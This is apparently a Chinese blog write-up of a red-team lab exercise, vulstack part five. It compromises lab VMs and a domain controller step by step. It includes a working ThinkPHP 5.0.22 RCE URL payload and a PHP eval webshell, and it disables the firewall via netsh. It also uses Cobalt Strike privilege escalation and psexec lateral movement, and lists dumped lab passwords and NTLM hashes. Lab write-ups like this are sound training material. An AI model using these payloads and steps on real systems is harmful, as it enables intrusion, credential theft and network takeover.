[ 内网渗透 ] vulstack红队评估(五)

简介: 根据作者公开的靶机信息整理

一、环境搭建:

①根据作者公开的靶机信息整理

虚拟机密码:

Win7:



heart 123.com    #本地管理员用户
sun\Administrator dc123.com    #域管用户,改为了panda123..

 

Win2008:


sun\admin 2020.com    #由于需要改密码,我更改为panda666...

 

②虚拟机网卡设置

Win7双网卡模拟内外网:

外网:桥接模式与物理机相通

内网:根据公开截图是:192.168.138.136,仅主机模式

 

利用管理员账号登进win7,并将其中一个网卡ip设置为桥接模式的网段ip:192.168.1.136

 

Win2008只通内网不通外网:

内网:根据公开截图是:192.168.138.138,仅主机模式

 

 

③整体环境梳理

靶机:

Win7:192.168.1.136(外网),192.168.138.136(内网)

Win2008:192.168.138.138(内网)

 

攻击机:

kali:192.168.1.2

win10:192.168.1.7

 

利用本地管理员heart登陆win7,并开启phpstudy,启动web环境:

 


二、web层渗透:

0x01 前期信息收集与漏洞利用:

①端口、服务探测:


nmap 192.168.1.136 -T4 -A -sV

 


②初探web

发现开启了80和3306,访问80端口的http服务,发现是thinkphp

 

 

 

③thinkphp rce一把梭

随便输入路径,让其报错,发现是5.0.22版本

 

直接去搜索历史漏洞,看下有没有可以直接getshell的,不难找到exp,而且直接RCE了


?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

④getshell

然后直接利用echo写入一句话方便后续操作,由于是靶机环境,不考虑免杀,实战中可能需要免杀一句话


?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php eval($_POST[cmd]);?^> > shell.php

直接利用蚁剑连接webshell

 


0x02 目标本机信息收集

①发现目标有两个ip,并且存在域sun.com,DNS服务器为192.168.138.138,基本上DNS服务器就是域控

 

查看进程信息,并没有发现杀软

那么目标肯定是横向移动,最终拿下这台域控了,这里为了熟悉Cobaltstrike,所有的内网渗透操作将利用cs完成,并且不存在杀软,就不用考虑免杀了,毕竟是靶机嘛emmm...

 

 


三、内网横向渗透

0x01 让目标主机上线

①使用web_delivery的方式,生成powershell命令


虚拟终端执行payload

 

稍等一会就看见cs上线了


0x02 提权

①设置心跳时间为1s,查看当前权限为管理员权限,为了后续更好操作,提权至system


②查看补丁情况,并分析可利用漏洞提权exp


shell systeminfo


windows提权辅助脚本提示存在MS15-051


③利用CS一键提权


提权成功返回一个system权限的beacon

 


0x03 内网横向移动

①查看防火墙情况,发现是开启状态


shell netsh firewall show state

 

为了方便操作,将防火墙关闭


shell netsh advfirewall set allprofiles state off


②内网常规信息收集

当前域内计算机列表:

 

域控列表:


用户列表:

 

③抓取凭证hash



抓取到的全部明文密码、ntlm hash

 

 

④上线域用户leo

Spawn As派生会话

 


选择leo的凭证

 

成功拿到leo的beacon

 


⑤继续收集域内信息


net user \\192.168.138.138

 

又发现多了一个admin用户

 

⑥信息汇总整理:









域名:sun.com
域控:192.168.138.138,机器名:DC
域内机器:192.168.138.136(win7)、192.168.138.138(DC)
所有用户:
非域:heart:123.com;ntlm:afffeba176210fad4628f0524bfe1942
域内用户:sun\administrator(域管):panda123..;ntml:31d6cfe0d16ae931b73c59d7e0c089c0
sun\leo:123.com;ntml:afffeba176210fad4628f0524bfe1942
sun\admin(未知)
krbtgt(未知)


 

0x04 攻击域控

①网络环境分析

边界机win7可通外网、内网,域控只能与win7通信,不能出网,所以想要拿到DC权限,可以通过:

1.psexec配合SMB beacon上线DC机器

2.link Listener+IPC$连接上马

 

②横向psexec拿下DC beacon


选择域管凭证,并选择smb beacon的监听器,选择一个会话进行横向移动,点击choose

 


成功利用域管账号拿下DC的smb beacon


③导出域内所有hash


 

四、总结

0x01 总体内网拓扑


0x02 整体思路

1.端口探测发现80端口web服务,利用thinkphp 5.0.22 rce漏洞getshell

2.简单主机信息收集发现双网卡,判断存在内网环境,并且有域

3.配合windows检测脚本,判断出可利用exp,并利用cs进行提权

4.内网、域常规信息收集,并关闭了防火墙方便后续操作

5.通过凭证hash获取到域用户、域管、其他用户的密码、hash

6.利用抓取到的域管凭证+psexec进行横向到域控

7.经过分析当前网络情况发现域控并不能出网,所以通过SMB beacon+psexec进行横向,最终拿下域控


目录
相关文章
|
安全 小程序 PHP
PHP代码审计(六)Seay源代码审计系统使用教程
www.cnseay.com/ 当然,这个已经不能访问了。 软件的版本比较早,需要.NET framework3.5框架,我这里是软件启动的时候自动提醒安装,如果没有自动提醒,那么你需要手动安装.NET frameWork3.5框架,否则,程序应该是没有办法运行。
1572 0
|
8月前
|
存储 安全 算法
即时通讯安全篇(十五):详解硬编码密码的泄漏风险及其扫描原理和工具
本文详细讨论了硬编码密码的成因、危害及治理方法,同时本文从安全人员的角度出发,对现有的硬编码密码检测工具的算法进行了深入调研,并提出了我们的自动化检测工具。
224 7
|
网络安全 数据安全/隐私保护 XML
2024“天一永安杯“宁波第七届网络安全大赛极安云科战队部分WP
2024“天一永安杯“宁波第七届网络安全大赛极安云科战队部分WP
2024“天一永安杯“宁波第七届网络安全大赛极安云科战队部分WP
|
物联网 开发工具 开发者
NRF52832官方SDK介绍
SDK(Software Development Kit)是指软件开发包,一般是由官方提供,主要用来介绍开发流程,提供常用的例程代码等等。可以降低开发者使用的门槛,提高开发效率,所以在开发者在进行具体的开发前必须先熟悉官方的SDK,一般可以在对应的官网获取(有些网站是开放的,可以直接下载,有些网站需要申请)。
861 0
|
存储 Web App开发 缓存
PWA 实践/应用(Google Workbox)
PWA(Progressive Web App – 渐进式网页应用)是一种理念,由 Google Chrome 在 2015 年提出。PWA 它不是特指某一项技术,而是应用多项技术来改善用户体验的 Web App,其核心技术包括 Web App Manifest、Service Worker、Web Push 等,用户体验才是 PWA 的核心。
3479 1
PWA 实践/应用(Google Workbox)
|
计算机视觉
kali不能联网-神奇ping不通之“相信科学”
kali不能联网-神奇ping不通之“相信科学”
395 0
身份证号码的编排规则
作者:知乎用户链接:https://www.zhihu.com/question/19823489/answer/13074347来源:知乎著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
3181 0
|
Java Maven
换阿里云的maven源
maven安装目录下conf文件夹settings.xml 把镜像源改为阿里云的,下载jar包飞快~! alimaven central aliyun maven http://maven.
8179 0
|
云安全 人工智能 安全
培养云上安全人才 | 阿里云2023首届CTF大赛重磅启动
角逐15万大奖,阿里云x清华大学2023首届CTF大赛火热报名中!
培养云上安全人才 | 阿里云2023首届CTF大赛重磅启动